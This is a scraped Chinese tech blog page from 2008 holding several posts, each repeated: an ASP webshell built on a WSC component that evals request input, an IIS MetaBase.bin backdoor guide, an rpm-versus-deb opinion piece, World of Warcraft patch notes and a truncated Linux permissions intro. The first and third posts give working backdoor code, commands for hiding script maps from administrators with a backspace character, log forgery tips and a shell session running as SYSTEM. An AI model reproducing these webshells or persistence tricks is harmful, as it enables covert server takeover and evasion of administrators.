利用wsc 来做一个asp后门
[ 2008/12/08 22:07 | by selboo ]
ScriptCodingInfo.wsc代码如下,该文件可以改成任意后缀:
backdoor.asp内容如下:
调用方法如下:http://url/backdoor.asp?a=CreateObject("Scripting.FileSystemObject").OpenTextFile("c:\1122.txt"),8,True,0).WriteLine("123")
注意这里的a=只能是vbs的代码,不可以接受像response、rquest之类的asp的东东。
如果是2000服务器可以在backdoor.asp远程调用ScriptCodingInfo.wsc,像
Set fs = GetObject("script:http://www.xx.com/ScriptCodingInfo.wsc#haiyangtop"),2003服务器中不可以。
算一个思路,鸡肋,谁有更好的办法完善,能够直接调用cs的asp木马的c端就好了。
<?xml version="1.0" encoding="gb2312" standalone="yes"?>
<?component error="true" debug="true"?>
<package>
<component id="haiyangtop">
<public>
<method name="lcx"><parameter name="b"/></method>
</public>
<script language="VBScript"><![CDATA[
sub lcx(b)
eval(b)
end sub
]]>
</script>
</component>
</package>
<?component error="true" debug="true"?>
<package>
<component id="haiyangtop">
<public>
<method name="lcx"><parameter name="b"/></method>
</public>
<script language="VBScript"><![CDATA[
sub lcx(b)
eval(b)
end sub
]]>
</script>
</component>
</package>
backdoor.asp内容如下:
<%
b=request("a")
Set fs = GetObject("script:d:/web/wwwroot/ScriptCodingInfo.wsc#haiyangtop")
fs.lcx(b)
%>
b=request("a")
Set fs = GetObject("script:d:/web/wwwroot/ScriptCodingInfo.wsc#haiyangtop")
fs.lcx(b)
%>
调用方法如下:http://url/backdoor.asp?a=CreateObject("Scripting.FileSystemObject").OpenTextFile("c:\1122.txt"),8,True,0).WriteLine("123")
注意这里的a=只能是vbs的代码,不可以接受像response、rquest之类的asp的东东。
如果是2000服务器可以在backdoor.asp远程调用ScriptCodingInfo.wsc,像
Set fs = GetObject("script:http://www.xx.com/ScriptCodingInfo.wsc#haiyangtop"),2003服务器中不可以。
算一个思路,鸡肋,谁有更好的办法完善,能够直接调用cs的asp木马的c端就好了。
rpm和deb从本质上就代表了不同理念
[ 2008/12/08 22:05 | by selboo ]
仔细考虑rpm的依赖关系
其实发现redhat当初考虑rpm
只是考虑到了从光盘这个给定范围内安装指定包的途径
由于源的范围很窄
所以他没有过多考虑卸载软件已经更新软件
他们当时需要的只是一个能够解决依赖关系
解决当安装A的时候要把B也安装进去问题的方法
从这个角度来看RPM工作的不错
其实你只是从redhat的光盘上安装软件
他看起来也不错.虽然有时候会安装你觉得完全依赖不到的东西
但是他们的解决方法就是.为了万无一失.凡是引用到的东西统统装进去.反正是从光盘上的.速度不会太差
但是遇到信息爆炸和软件数量激增的情况下
就很难去管理这么大一个库
而rpm的设计方式注定了无法别人参与维护这个源
而deb的管理.其实应该说是apt的管理
从一开始就源于debian的包或者源不可能只有一个组织维护
其贡献者会非常多
所以他的依赖比较松散,而且对卸载和更新的要求考虑的比较周到
而之后的yum,只能是把rpm的依赖关系搬移到网上
并没有本质上解决rpm的痼疾.
所以当rpm遇见个人发布的内容的时候
如果使用默认的rpm打包方式
会发现你打出的包由于依赖关系安装很麻烦.卸载更加是件几乎不可能的事情.
因为你的应用不是redhat的.不在他们的光盘中
redhat之所以放弃桌面版linux市场
其一是linux桌面版确实很难盈利
其二是在本身就是开源环境的条件下
软件的更新和加入如此频繁.
在网络速度已经很高的前提下就开始暴露出来的rpm打包软件难以维护的问题
到后面已经是积重难返了.
而退缩企业市场,企业市场出于稳定性和可靠性,
不可能安装来自那么多第三方源的软件
这样redhat维护和管理一个较小的软件源的可能性就大大增加了.
我们看到debian或者ubuntu的系统
都是一张CD,而这在他们看来是基础CD
可以通过这个CD扩展
而redhat和suse的概念就不同
要不是DVD,要不就是几张或者十几张CD
这些CD.就是他们的全部内容
你要安装这之外的软件.将会非常困难.
由此我觉得.redhat的rpm代表的是狭隘以及短视,封闭
而deb或者gentoo的包管理方式.更加开放和富有远见.
其实发现redhat当初考虑rpm
只是考虑到了从光盘这个给定范围内安装指定包的途径
由于源的范围很窄
所以他没有过多考虑卸载软件已经更新软件
他们当时需要的只是一个能够解决依赖关系
解决当安装A的时候要把B也安装进去问题的方法
从这个角度来看RPM工作的不错
其实你只是从redhat的光盘上安装软件
他看起来也不错.虽然有时候会安装你觉得完全依赖不到的东西
但是他们的解决方法就是.为了万无一失.凡是引用到的东西统统装进去.反正是从光盘上的.速度不会太差
但是遇到信息爆炸和软件数量激增的情况下
就很难去管理这么大一个库
而rpm的设计方式注定了无法别人参与维护这个源
而deb的管理.其实应该说是apt的管理
从一开始就源于debian的包或者源不可能只有一个组织维护
其贡献者会非常多
所以他的依赖比较松散,而且对卸载和更新的要求考虑的比较周到
而之后的yum,只能是把rpm的依赖关系搬移到网上
并没有本质上解决rpm的痼疾.
所以当rpm遇见个人发布的内容的时候
如果使用默认的rpm打包方式
会发现你打出的包由于依赖关系安装很麻烦.卸载更加是件几乎不可能的事情.
因为你的应用不是redhat的.不在他们的光盘中
redhat之所以放弃桌面版linux市场
其一是linux桌面版确实很难盈利
其二是在本身就是开源环境的条件下
软件的更新和加入如此频繁.
在网络速度已经很高的前提下就开始暴露出来的rpm打包软件难以维护的问题
到后面已经是积重难返了.
而退缩企业市场,企业市场出于稳定性和可靠性,
不可能安装来自那么多第三方源的软件
这样redhat维护和管理一个较小的软件源的可能性就大大增加了.
我们看到debian或者ubuntu的系统
都是一张CD,而这在他们看来是基础CD
可以通过这个CD扩展
而redhat和suse的概念就不同
要不是DVD,要不就是几张或者十几张CD
这些CD.就是他们的全部内容
你要安装这之外的软件.将会非常困难.
由此我觉得.redhat的rpm代表的是狭隘以及短视,封闭
而deb或者gentoo的包管理方式.更加开放和富有远见.
IIS配置文件(MetaBase.bin)后门
[ 2008/12/08 21:42 | by selboo ]
本文的内容是如何利用IIS本身的一些特性建立后门.当然,这主要是一份供网络管理员和网络安全工作人员参考的“Know Your Enemy”类文档,作者希望这篇文章能够对检查和清除后门有所帮助,而并不鼓励或赞同利用本文的技巧进行违法活动.
首先简单介绍一下IIS的配置文件MetaBase.bin.这个文件位于%SystemRoot%\system32\inetsrv\MetaBase.bin,包含了几乎所有IIS的配置信息,是非常重要的系统文件.简单的说,我们在“intenet服务管理器”中所作的一切设置最终都会被保存在MetaBase.bin中.在日常的系统管理中除了通过“intenet服务管理器”来对MetaBase.bin进行操作外,Windows还提供了一个脚本adsutil.vbs可以对MetaBase.bin进行操作.
MetaBase的结构类似于注册表,也是树形结构,有类似键、值、项的概念.事实上在IIS3和PWS中,MetaBase的内容就是存储在注册表中的.MetaBase有两个主键:LM和Schema.其中,Schema保存了系统默认的一些配置,通常不需要修改,一旦改错也非常危险,所以无论是“intenet服务管理器”还是adsutil.vbs都没有提供修改Schema的机制.LM中包含了IIS的HTTP服务,FTP服务,SMTP服务等的配置信息.其中,LM/W3SVC/下是我们要用到的HTTP服务的配置信息.
几个下面会提到的值:
LM/W3SVC/InProcessIsapiApps,进程内启动ISAPI.这是一个数组,里面包含的是一组指向一些ISAPI的路径.在这个数组里面的ISAPI运行的时候都是由inetinfo.exe直接启动的,继承inetinfo.exe的local system权限;而不在其中的ISAPI则是由svchost.exe派生的dllhost.exe进程启动的,运行的身份是IWAM_NAME,当然,这是IIS默认的安全级别“中”的情况下,如果设为低,那么所有ISAPI都会由inetinfo.exe直接派生.另外,如果设定的时候不指定路径,而是仅指定一个扩展名,那么任何路径下的同名ISAPI在被调用的时候都会以system权限执行.
ScriptMaps,脚本映射.在某个目录下设定该值后,则向该目录请求的特定扩展名的文件会交给指定的ISAPI执行.需要强调的是,设定ScriptMaps的目录并不一定要真实存在的,只要在MetaBase中某个HTTP实例的root键下建了一个子键,对该字键同名目录的HTTP请求IIS会认为是合法的,并会交由映射的ISAPI处理.这也算是IIS的一个问题吧.
CreateProcessAsUser,在某个目录下指定改值为0,则该目录下的应用程序会继承inetinfo.exe的local system权限.
AccessWrite,决定某个目录是否允许写入,也就是WEBDAV的PUT方法.
AccessExecute,决定某个目录是否允许执行应用程序.
后门思路:
创建一个特定扩展名的脚本映射,指向我们的ISAPI,并把该ISAPI添加到InProcessIsapiApps列表中.那么我们向服务器请求该扩展名类型文件时就会在服务器上以local system权限执行该ISAPI,且所请求的文件并不需要是真实存在的.
技巧:
1、既然并不需要真的建一个目录来设定ScriptMaps,那么就可以只写一个键,并给这个键加上ScriptMaps.这样,从“intenet服务管理器”里是看不出这个目录的,更看不到这个ScriptMaps.
2、虽然“intenet服务管理器”里面看不出来,但是有经验的管理员可能习惯于偶尔用adsutil.vbs enum /p来看一下:
# adsutil.vbs enum /p /w3svc/1/root
Microsoft (R) Windows Script Host Version 5.6
版权所有(C) Microsoft Corporation 1996-2001.保留所有权利.
[/w3svc/1/root/_vti_bin]
[/w3svc/1/root/evildir]
这样就暴露了.
因为我们设的那个键并不是真实存在的虚拟目录,只是配置文件中的一个字符串,所以可以使用0x08这样的字符来做键值.0x08是Backspace键对应的16进制值,控制台上显示的效果是向左边删除一个字符,其实就是把“/”给删了:
# adsutil.vbs enum /p /w3svc/1/root
Microsoft (R) Windows Script Host Version 5.6
版权所有(C) Microsoft Corporation 1996-2001.保留所有权利.
[/w3svc/1/root/_vti_bin]
[/w3svc/1/root]
面对这种输出,一般人是不会留意的.
当然也可以设为类似_vti_script,_vti_bin这样的名字,只要不设KeyType,在“intenet服务管理器”中是看不见的.
因为系统中本身InProcessIsapiApps中有一个\WINNT\System32\msw3prt.dll,是.printer的映射,一般用不上.我们可以删掉D:\WINNT\System32\msw3prt.dll的值,换上\WINNT\System32\inetsrv\msw3prt.dll.
3、美中不足的是HTTP请求会留下痕迹,但是HTTP也有好处,那就是可以随便用一个代理服务器做跳板.另外,也可以用插入0x0D 0x0A来伪造日志的方法,(详见《Apache,IIS等多种http服务器允许通过发送回车符伪造日志》一文)这就是构造目录的技巧了.
具体实现:
当然可以用adsutil.vbs手工来加.不过需要注意,adsutil.vbs只能设,不能改,所以用adsutil.vbs的时候一定要把原先的也加上,否则原先的就会丢失.不同条目之间用空格分开.
先用下面命令取得当前的InProcessIsapiApps列表:
adsutil.vbs get /W3SVC/InProcessIsapiApps
取到之后把自己的ISAPI路径也加进去.
adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\System32\idq.dll" "C:\WINNT\System32\inetsrv\httpext.dll" ………………
ScriptMaps的设定同InProcessIsapiApps.
当然这样比较麻烦,也无法写入0x08这样的键值,所以我干脆自己写个VBS一次性搞定.至于那个做后门的ISAPI,能实现的功能就完全取决于想象力了.这里是一个简单例子的屏幕拷贝:
# nc 10.11.0.26 80
POST /%08/anything.tom
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-1998 Microsoft Corp.
C:\WINNT\system32>whoami
NT AUTHORITY\SYSTEM
C:\WINNT\system32>exit
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Wed, 08 Jan 2003 06:49:37 GMT
更隐蔽的方法是写一个特殊的ISAPI,并注册为解析asp的.通常情况下,该程序把收到的请求转给系统原来的asp.dll,并把结果返回,当收到一个特殊POST请求时就启动自己的后门代码,这样日志里面也不会有什么显示.审核时也很难发现.
除了上面所述利用脚本映射的方法外,还可以赋予某个虚拟目录AccessWrite和AccessExecute权限.需要运行后门的时候利用WEBDAV上载ISAPI,然后运行,使用完了再删除.(是否能删除?还是需要restart W3SVC ?我没有试验.)如果上载的不是DLL而是EXE文件,那么把该目录下的CreateProcessAsUser设为0也可以获得local system权限,这个方法早有人撰文论述.但AccessWrite和AccessExecute的改变都可以在“intenet服务管理器”中看出来,隐蔽性就差了.
首先简单介绍一下IIS的配置文件MetaBase.bin.这个文件位于%SystemRoot%\system32\inetsrv\MetaBase.bin,包含了几乎所有IIS的配置信息,是非常重要的系统文件.简单的说,我们在“intenet服务管理器”中所作的一切设置最终都会被保存在MetaBase.bin中.在日常的系统管理中除了通过“intenet服务管理器”来对MetaBase.bin进行操作外,Windows还提供了一个脚本adsutil.vbs可以对MetaBase.bin进行操作.
MetaBase的结构类似于注册表,也是树形结构,有类似键、值、项的概念.事实上在IIS3和PWS中,MetaBase的内容就是存储在注册表中的.MetaBase有两个主键:LM和Schema.其中,Schema保存了系统默认的一些配置,通常不需要修改,一旦改错也非常危险,所以无论是“intenet服务管理器”还是adsutil.vbs都没有提供修改Schema的机制.LM中包含了IIS的HTTP服务,FTP服务,SMTP服务等的配置信息.其中,LM/W3SVC/下是我们要用到的HTTP服务的配置信息.
几个下面会提到的值:
LM/W3SVC/InProcessIsapiApps,进程内启动ISAPI.这是一个数组,里面包含的是一组指向一些ISAPI的路径.在这个数组里面的ISAPI运行的时候都是由inetinfo.exe直接启动的,继承inetinfo.exe的local system权限;而不在其中的ISAPI则是由svchost.exe派生的dllhost.exe进程启动的,运行的身份是IWAM_NAME,当然,这是IIS默认的安全级别“中”的情况下,如果设为低,那么所有ISAPI都会由inetinfo.exe直接派生.另外,如果设定的时候不指定路径,而是仅指定一个扩展名,那么任何路径下的同名ISAPI在被调用的时候都会以system权限执行.
ScriptMaps,脚本映射.在某个目录下设定该值后,则向该目录请求的特定扩展名的文件会交给指定的ISAPI执行.需要强调的是,设定ScriptMaps的目录并不一定要真实存在的,只要在MetaBase中某个HTTP实例的root键下建了一个子键,对该字键同名目录的HTTP请求IIS会认为是合法的,并会交由映射的ISAPI处理.这也算是IIS的一个问题吧.
CreateProcessAsUser,在某个目录下指定改值为0,则该目录下的应用程序会继承inetinfo.exe的local system权限.
AccessWrite,决定某个目录是否允许写入,也就是WEBDAV的PUT方法.
AccessExecute,决定某个目录是否允许执行应用程序.
后门思路:
创建一个特定扩展名的脚本映射,指向我们的ISAPI,并把该ISAPI添加到InProcessIsapiApps列表中.那么我们向服务器请求该扩展名类型文件时就会在服务器上以local system权限执行该ISAPI,且所请求的文件并不需要是真实存在的.
技巧:
1、既然并不需要真的建一个目录来设定ScriptMaps,那么就可以只写一个键,并给这个键加上ScriptMaps.这样,从“intenet服务管理器”里是看不出这个目录的,更看不到这个ScriptMaps.
2、虽然“intenet服务管理器”里面看不出来,但是有经验的管理员可能习惯于偶尔用adsutil.vbs enum /p来看一下:
# adsutil.vbs enum /p /w3svc/1/root
Microsoft (R) Windows Script Host Version 5.6
版权所有(C) Microsoft Corporation 1996-2001.保留所有权利.
[/w3svc/1/root/_vti_bin]
[/w3svc/1/root/evildir]
这样就暴露了.
因为我们设的那个键并不是真实存在的虚拟目录,只是配置文件中的一个字符串,所以可以使用0x08这样的字符来做键值.0x08是Backspace键对应的16进制值,控制台上显示的效果是向左边删除一个字符,其实就是把“/”给删了:
# adsutil.vbs enum /p /w3svc/1/root
Microsoft (R) Windows Script Host Version 5.6
版权所有(C) Microsoft Corporation 1996-2001.保留所有权利.
[/w3svc/1/root/_vti_bin]
[/w3svc/1/root]
面对这种输出,一般人是不会留意的.
当然也可以设为类似_vti_script,_vti_bin这样的名字,只要不设KeyType,在“intenet服务管理器”中是看不见的.
因为系统中本身InProcessIsapiApps中有一个\WINNT\System32\msw3prt.dll,是.printer的映射,一般用不上.我们可以删掉D:\WINNT\System32\msw3prt.dll的值,换上\WINNT\System32\inetsrv\msw3prt.dll.
3、美中不足的是HTTP请求会留下痕迹,但是HTTP也有好处,那就是可以随便用一个代理服务器做跳板.另外,也可以用插入0x0D 0x0A来伪造日志的方法,(详见《Apache,IIS等多种http服务器允许通过发送回车符伪造日志》一文)这就是构造目录的技巧了.
具体实现:
当然可以用adsutil.vbs手工来加.不过需要注意,adsutil.vbs只能设,不能改,所以用adsutil.vbs的时候一定要把原先的也加上,否则原先的就会丢失.不同条目之间用空格分开.
先用下面命令取得当前的InProcessIsapiApps列表:
adsutil.vbs get /W3SVC/InProcessIsapiApps
取到之后把自己的ISAPI路径也加进去.
adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\System32\idq.dll" "C:\WINNT\System32\inetsrv\httpext.dll" ………………
ScriptMaps的设定同InProcessIsapiApps.
当然这样比较麻烦,也无法写入0x08这样的键值,所以我干脆自己写个VBS一次性搞定.至于那个做后门的ISAPI,能实现的功能就完全取决于想象力了.这里是一个简单例子的屏幕拷贝:
# nc 10.11.0.26 80
POST /%08/anything.tom
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-1998 Microsoft Corp.
C:\WINNT\system32>whoami
NT AUTHORITY\SYSTEM
C:\WINNT\system32>exit
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Wed, 08 Jan 2003 06:49:37 GMT
更隐蔽的方法是写一个特殊的ISAPI,并注册为解析asp的.通常情况下,该程序把收到的请求转给系统原来的asp.dll,并把结果返回,当收到一个特殊POST请求时就启动自己的后门代码,这样日志里面也不会有什么显示.审核时也很难发现.
除了上面所述利用脚本映射的方法外,还可以赋予某个虚拟目录AccessWrite和AccessExecute权限.需要运行后门的时候利用WEBDAV上载ISAPI,然后运行,使用完了再删除.(是否能删除?还是需要restart W3SVC ?我没有试验.)如果上载的不是DLL而是EXE文件,那么把该目录下的CreateProcessAsUser设为0也可以获得local system权限,这个方法早有人撰文论述.但AccessWrite和AccessExecute的改变都可以在“intenet服务管理器”中看出来,隐蔽性就差了.
魔兽2.4.3升级3.0.5补丁包种子
[ 2008/12/08 20:46 | by selboo ]
终于等到 3.0 了...
由于官方提供的下载工具速度慢死了...
所以我就,找了下种子...
服务器列表
http://cn.tracker.worldofwarcraft.com:3724/announce
美国魔兽官网
worldofwarcraft.com
种子下载
下载文件 (已下载 221 次)
魔兽世界客户端3.0 升级补丁说明
http://www.wowchina.com/info/patch/112177.shtml
3.0.5对术士的修改
• 清算(毁灭系) - 从5点天赋减少为2点天赋。
• 所有恶魔的技能和法术将会在宠物升级时自动获得。恶魔训练师将被移除。
• 躲闪 (恶魔卫士): 现在使你的宠物因范围伤害攻击受到的伤害降低80%,魅魔,小鬼,虚空行者和恶魔卫士达到10级时可自动学得。
• 灾祸现在降低鬼影缠身的施法时间。
• 血之契约现在作用于整个团队(不仅仅只有小队)。
• 灾变(毁灭系) - 现在每一点同样使你的毁灭系法术的命中几率提高1%。
• 混乱之箭现在造成火焰伤害而不是混乱伤害。
• 燃烧现在只能在已经被施加暗影烈焰效果的目标上释放。
• 吞噬暗影 (虚空行者):持续时间缩短至6秒,效果增加66%。现在同样在引导时使所有周围的友方目标的潜行侦测能力大大提高。
• 厄运诅咒现在只能在可以为你提供经验值或荣誉值的目标身上召唤末日守卫。
• 鲁莽诅咒不再阻止恐惧效果,只能阻止NPC的逃跑。(比如. 低血量。)
• 黑暗契约:说明更新于其他相同效果更一致,现在从你召唤的宠物身上吸取法力,并以200%转化给你。以前为100%。
• 魔甲术 - 现在使施法者的法术和效果恢复的生命值提高20%,不再可以在战斗中恢复生命值。
• 恶魔法阵现在持续6分钟。
• 恶魔契约不再对被奴役的恶魔有效。
• 恶魔皮肤,魔甲术和邪甲术不再是魔法效果并不能被驱散。
• 恶魔牺牲:魅魔的效果从增加15%暗影伤害降低为增加10%暗影伤害。小鬼效果从增加15%火焰伤害降低为增加10%火焰伤害。恶魔卫士效果从只增加暗影伤害改为增加火焰和暗影伤害。
• 末日守卫:生命值增加20%,法力值增加24%。
• 吸取灵魂现在如果目标低于25%血量将造成4倍伤害。
• 持久痛苦将不在对暗影箭起作用,而对鬼影缠身起作用。
• 灰烬风暴现在缩短你的烧尽法术的施法时间0.1/0.2/0.3/0.4/0.5秒。
• 邪甲术 - 现在使你的法术伤害的值提高相当于你精神总值的30%。但不再增加治疗效果20%。
• 恶魔卫士:生命值增加10%。
• 地狱猎犬:多疑和腐坏之血被邪能智力和暗影撕咬替代
• 邪能智力(地狱猎犬):使小队和团队成员的智力和精神提高3%。持续直到取消。
• 恶魔耐力(恶魔学识)与恶魔智力一起合并为邪能活力。
• 鬼影缠身现在恢复相当于目标受到伤害100%的生命值。
• 恐惧嚎叫现在消耗15%基础法力。
• 地狱火:冷却时间从1小时缩短为15分钟。持续时间从5分钟缩短为1分钟。生命值提高30%,伤害提高60%,护甲值提高30%。
• 地狱火现在召唤的地狱火只能持续1分钟。
• 小鬼:生命值增加20%,护甲增加16%,法力回复增加200%。
• 强化虚弱诅咒(痛苦系)现在为“脆弱” - 使你的虚弱诅咒提供的攻击强度削弱效果提高10/20%, 鲁莽诅咒提供的攻击强度加成效果降低10/20%。
• 强化奴役恶魔(恶魔学识)从天赋树第4层移至第5层。
• 强化奴役恶魔(毁灭系)和强化火焰箭被合并为一个天赋, 恶魔之能。
• 强化暗影箭(毁灭系) - 现在使你的下一发暗影伤害法术的伤害提高3/6/9/12/15%,以前为4/8/12/16/20%。
• 法力喂食:说明更新与其他类似效果一致。
• 恶魔学识大师(恶魔学识) - 大部分效果被修改。
恶魔学识大师 – 恶魔卫士(恶魔学识) - 使你的所有伤害提高1/2/3/4/5%, 降低所有对你的伤害1/2/3/4/5%.
恶魔学识大师 – 小鬼(恶魔学识) - 使你的火焰伤害提高1/2/3/4/5%,你的火焰法术的爆击几率提高1/2/3/4/5%。
恶魔学识大师 – 魅魔(恶魔学识) - 使你的暗影伤害提高1/2/3/4/5%, 你的暗影法术的爆击几率提高1/2/3/4/5%。
• 虚空防护经过重新制作。被法术击中之后有10/20/30%的几率获得虚空防护效果,使该系法术对你造成的所有伤害降低60%,持续10秒。
• 新天赋:恶魔增效(恶魔学识) - 使你召唤的恶魔在一段时间内获得能量。
• 新天赋:根除(痛苦系) - 你的腐蚀术,生命虹吸和痛苦诅咒每一跳都有5/10/15%几率令你的施法速度提高20%,持续8秒。这种效果每10秒只能触发一次。
• 新天赋:强化地狱猎犬(痛苦系):你的地狱猎犬的暗影撕咬技能每次命中目标都可以恢复相当于它的暗影撕咬伤害的50/100%法力值,并你的地狱猎犬的邪能智力的效果提高1/2%。
• 新天赋:熔火之心(毁灭系) - 你的暗影系法术和持续伤害效果有5/10/15%的几率令你的火焰系法术所造成的伤害提高10%,持续6秒。
• 火焰冲撞(毁灭系) - 现在同样包括燃烧。
• 火焰之雨(末日守卫): 修正了一个没一跳火焰之雨吞噬它的法力消耗的错误。
• 灵魂仪式:使用次数从10次增加为25次。
• 暗影撕咬(地狱猎犬):造成暗影伤害,外加你施加于该目标的每个持续伤害效果所提供的5%伤害加成,6秒冷却时间。
• 暗影之怒(毁灭系) - 现在可以在移动时释放。昏迷持续时间从2秒增加到3秒。
• 灵魂链接(恶魔学识) 现在在天赋树第3层(以前在天赋树第7层),但该天赋5%的伤害加成被移除。此外,灵魂链接的伤害吸收从20%,降低为15%。
• 灵魂虹吸(痛苦系):现在同样使你的吸取灵魂的伤害增加。
• 灵魂石现在会生成一条记录,谁释放和谁获得了灵魂石。
• 法术封锁(恶魔猎犬)的公共冷却时间被移除。
• 魅魔:生命值提升20%,护甲值提升22%。
• 召唤恐惧战马/召唤地狱战马:法力消耗被移除,公共冷却时间被移除。
• 镇压(痛苦系)现在从5点天赋减少为3点天赋。使你的痛苦系法术的命中几率提高1/2/3%, 以前为1/2/3/4/5%
• 痛苦无常(痛苦系):沉默效果从5秒缩短为3秒。
• 虚空行者:生命值提升20%,伤害提升16%。虚空行者从它主人的法伤获得的攻击强度提升到45%。
本人九区鲜血熔炉-部落-selboo
由于官方提供的下载工具速度慢死了...
所以我就,找了下种子...
服务器列表
http://cn.tracker.worldofwarcraft.com:3724/announce
美国魔兽官网
worldofwarcraft.com
种子下载
下载文件 (已下载 221 次)魔兽世界客户端3.0 升级补丁说明
http://www.wowchina.com/info/patch/112177.shtml
3.0.5对术士的修改
• 清算(毁灭系) - 从5点天赋减少为2点天赋。
• 所有恶魔的技能和法术将会在宠物升级时自动获得。恶魔训练师将被移除。
• 躲闪 (恶魔卫士): 现在使你的宠物因范围伤害攻击受到的伤害降低80%,魅魔,小鬼,虚空行者和恶魔卫士达到10级时可自动学得。
• 灾祸现在降低鬼影缠身的施法时间。
• 血之契约现在作用于整个团队(不仅仅只有小队)。
• 灾变(毁灭系) - 现在每一点同样使你的毁灭系法术的命中几率提高1%。
• 混乱之箭现在造成火焰伤害而不是混乱伤害。
• 燃烧现在只能在已经被施加暗影烈焰效果的目标上释放。
• 吞噬暗影 (虚空行者):持续时间缩短至6秒,效果增加66%。现在同样在引导时使所有周围的友方目标的潜行侦测能力大大提高。
• 厄运诅咒现在只能在可以为你提供经验值或荣誉值的目标身上召唤末日守卫。
• 鲁莽诅咒不再阻止恐惧效果,只能阻止NPC的逃跑。(比如. 低血量。)
• 黑暗契约:说明更新于其他相同效果更一致,现在从你召唤的宠物身上吸取法力,并以200%转化给你。以前为100%。
• 魔甲术 - 现在使施法者的法术和效果恢复的生命值提高20%,不再可以在战斗中恢复生命值。
• 恶魔法阵现在持续6分钟。
• 恶魔契约不再对被奴役的恶魔有效。
• 恶魔皮肤,魔甲术和邪甲术不再是魔法效果并不能被驱散。
• 恶魔牺牲:魅魔的效果从增加15%暗影伤害降低为增加10%暗影伤害。小鬼效果从增加15%火焰伤害降低为增加10%火焰伤害。恶魔卫士效果从只增加暗影伤害改为增加火焰和暗影伤害。
• 末日守卫:生命值增加20%,法力值增加24%。
• 吸取灵魂现在如果目标低于25%血量将造成4倍伤害。
• 持久痛苦将不在对暗影箭起作用,而对鬼影缠身起作用。
• 灰烬风暴现在缩短你的烧尽法术的施法时间0.1/0.2/0.3/0.4/0.5秒。
• 邪甲术 - 现在使你的法术伤害的值提高相当于你精神总值的30%。但不再增加治疗效果20%。
• 恶魔卫士:生命值增加10%。
• 地狱猎犬:多疑和腐坏之血被邪能智力和暗影撕咬替代
• 邪能智力(地狱猎犬):使小队和团队成员的智力和精神提高3%。持续直到取消。
• 恶魔耐力(恶魔学识)与恶魔智力一起合并为邪能活力。
• 鬼影缠身现在恢复相当于目标受到伤害100%的生命值。
• 恐惧嚎叫现在消耗15%基础法力。
• 地狱火:冷却时间从1小时缩短为15分钟。持续时间从5分钟缩短为1分钟。生命值提高30%,伤害提高60%,护甲值提高30%。
• 地狱火现在召唤的地狱火只能持续1分钟。
• 小鬼:生命值增加20%,护甲增加16%,法力回复增加200%。
• 强化虚弱诅咒(痛苦系)现在为“脆弱” - 使你的虚弱诅咒提供的攻击强度削弱效果提高10/20%, 鲁莽诅咒提供的攻击强度加成效果降低10/20%。
• 强化奴役恶魔(恶魔学识)从天赋树第4层移至第5层。
• 强化奴役恶魔(毁灭系)和强化火焰箭被合并为一个天赋, 恶魔之能。
• 强化暗影箭(毁灭系) - 现在使你的下一发暗影伤害法术的伤害提高3/6/9/12/15%,以前为4/8/12/16/20%。
• 法力喂食:说明更新与其他类似效果一致。
• 恶魔学识大师(恶魔学识) - 大部分效果被修改。
恶魔学识大师 – 恶魔卫士(恶魔学识) - 使你的所有伤害提高1/2/3/4/5%, 降低所有对你的伤害1/2/3/4/5%.
恶魔学识大师 – 小鬼(恶魔学识) - 使你的火焰伤害提高1/2/3/4/5%,你的火焰法术的爆击几率提高1/2/3/4/5%。
恶魔学识大师 – 魅魔(恶魔学识) - 使你的暗影伤害提高1/2/3/4/5%, 你的暗影法术的爆击几率提高1/2/3/4/5%。
• 虚空防护经过重新制作。被法术击中之后有10/20/30%的几率获得虚空防护效果,使该系法术对你造成的所有伤害降低60%,持续10秒。
• 新天赋:恶魔增效(恶魔学识) - 使你召唤的恶魔在一段时间内获得能量。
• 新天赋:根除(痛苦系) - 你的腐蚀术,生命虹吸和痛苦诅咒每一跳都有5/10/15%几率令你的施法速度提高20%,持续8秒。这种效果每10秒只能触发一次。
• 新天赋:强化地狱猎犬(痛苦系):你的地狱猎犬的暗影撕咬技能每次命中目标都可以恢复相当于它的暗影撕咬伤害的50/100%法力值,并你的地狱猎犬的邪能智力的效果提高1/2%。
• 新天赋:熔火之心(毁灭系) - 你的暗影系法术和持续伤害效果有5/10/15%的几率令你的火焰系法术所造成的伤害提高10%,持续6秒。
• 火焰冲撞(毁灭系) - 现在同样包括燃烧。
• 火焰之雨(末日守卫): 修正了一个没一跳火焰之雨吞噬它的法力消耗的错误。
• 灵魂仪式:使用次数从10次增加为25次。
• 暗影撕咬(地狱猎犬):造成暗影伤害,外加你施加于该目标的每个持续伤害效果所提供的5%伤害加成,6秒冷却时间。
• 暗影之怒(毁灭系) - 现在可以在移动时释放。昏迷持续时间从2秒增加到3秒。
• 灵魂链接(恶魔学识) 现在在天赋树第3层(以前在天赋树第7层),但该天赋5%的伤害加成被移除。此外,灵魂链接的伤害吸收从20%,降低为15%。
• 灵魂虹吸(痛苦系):现在同样使你的吸取灵魂的伤害增加。
• 灵魂石现在会生成一条记录,谁释放和谁获得了灵魂石。
• 法术封锁(恶魔猎犬)的公共冷却时间被移除。
• 魅魔:生命值提升20%,护甲值提升22%。
• 召唤恐惧战马/召唤地狱战马:法力消耗被移除,公共冷却时间被移除。
• 镇压(痛苦系)现在从5点天赋减少为3点天赋。使你的痛苦系法术的命中几率提高1/2/3%, 以前为1/2/3/4/5%
• 痛苦无常(痛苦系):沉默效果从5秒缩短为3秒。
• 虚空行者:生命值提升20%,伤害提升16%。虚空行者从它主人的法伤获得的攻击强度提升到45%。
本人九区鲜血熔炉-部落-selboo
Linux文件特殊属性
[ 2008/12/04 21:37 | by selboo ]
Linux文件特殊属性
Linux文件特殊属性主要包括它的默认权限、隐藏属性和特殊权限(SUID/SGID/SBIT).
下面我们就来分别讲解它的这些特殊属性.
1. Linux文件默认权限:umask
我们在新建立一个文件时,它都有自己的默认属性.它们的默认属性是通过"umask"值来设定的.那么如何来查看和设置umask值呢?
①.查看umask值
[root@localhost /]#umask(数字形式)
0022
[root@localhost /]#umask –S(符号形式)
u=rwx,g=rx,o=rx
上面的命令显示出umask值的两种表现形式.我们看到数字表现出来的有4位数字,第一位数字用来表示特殊权限,我们在后面介绍,第二
Linux文件特殊属性主要包括它的默认权限、隐藏属性和特殊权限(SUID/SGID/SBIT).
